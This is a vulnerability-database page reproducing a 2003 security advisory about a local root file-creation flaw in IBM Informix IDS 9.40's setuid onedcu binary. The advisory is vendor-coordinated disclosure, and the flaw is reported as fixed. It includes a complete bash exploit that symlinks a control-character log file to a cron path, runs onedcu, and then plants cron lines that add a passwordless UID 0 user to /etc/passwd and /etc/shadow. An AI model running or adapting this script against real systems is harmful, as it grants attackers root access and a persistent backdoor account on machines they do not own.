Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

open3sIDSonedcu.txt

🗓️ 29 Jan 2004 00:00:00Reported by Juan Manuel Pascual EscribaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 37 Views

Local vulnerability in IBM Informix IDSv9.40 allows file creation with root permissions.

Code
`  
  
----------========== OPEN3S-2003-08-08-eng-informix-onedcu ==========----------  
  
Title: Local Vulnerability in IBM Informix IDSv9.40 onedcu binary  
Date: 08-08-2003  
Platform: Only tested in Linux but can be exported to others.  
Impact: Users with exec perm over ./bin/onedcu can create files   
with 666 mode and owned by root.  
Author: Juan Manuel Pascual Escriba <[email protected]>  
Status: Solved by IBM Corp.  
  
  
PROBLEM SUMMARY:  
  
There is a write permisions checking error in onedcu binary that can be used by local  
users with exec perm over onedcu to write any file owned by root with mode 666.   
  
  
DESCRIPTION  
  
onedcu is installed with 6755 perm and owned by root.informix in my default installation  
  
[informix@dimoni onedcu]$ ls -alc /home/informix-9.40/bin/onedcu  
-rwsr-sr-x 1 root informix 1066468 Aug 8 23:39 /home/informix-9.40/bin/onedcu  
  
  
The binary does'nt drop privileges before writing the log and writes \001 file owned by root:  
  
  
IMPACT:  
  
Easy to overwrite or create new files owned by root (.rhosts, cron files) via link   
injection.  
  
EXPLOIT  
  
#!/bin/bash  
  
ONEDCU=/home/informix-9.40/bin/onedcu  
CRONFILE=/etc/cron.hourly/pakito  
USER=pakito  
DIR=./trash  
  
export INFORMIXDIR=/home/informix-9.40/  
export ONCONFIG=onconfig.std  
  
if [ -d $DIR ]; then  
echo Trash directory already created  
else  
mkdir $DIR  
fi  
  
cd $DIR  
if [ -f ./"\001" ]; then  
echo Link Already Created  
else  
ln -s $CRONFILE `echo -e "\001"`  
fi  
  
umask 000  
$ONEDCU &  
kill -9 `pidof $ONEDCU`  
  
  
echo "echo "#!/bin/bash"" > $CRONFILE  
echo "echo "$USER:x:0:0::/:/bin/bash" >> /etc/passwd" >> $CRONFILE  
echo "echo "$USER::12032:0:99999:7:::" >> /etc/shadow" >> $CRONFILE  
echo " "  
echo " This vulnerability was researched by Juan Manuel Pascual Escriba"  
echo " 08/08/2003 Barcelona - Spain [email protected]  
echo " "  
echo " must wait until cron execute $CRONFILE and then exec su pakito"  
  
  
  
STATUS   
  
Reported to IBM security team at 11th of August 2003  
  
See more infomartion about this vulnerability and workaround at:  
http://www-1.ibm.com/support/docview.wss?uid=swg21153336  
  
This vulnerability was managed in an efficient manner by Jonathan Leffler   
from IBM Informix Database Engineering Team.  
  
  
--------------------------------------------------  
This vulnerability was researched by:  
Juan Manuel Pascual Escriba [email protected]  
Barcelona - Spain http://www.open3s.com  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Jan 2004 00:00Current
7.4High risk
Vulners AI Score7.4
vulnerabilityibm informixonedcu binaryroot permissionswrite permissionslinuxfile creationimpactsecurity exploit.
37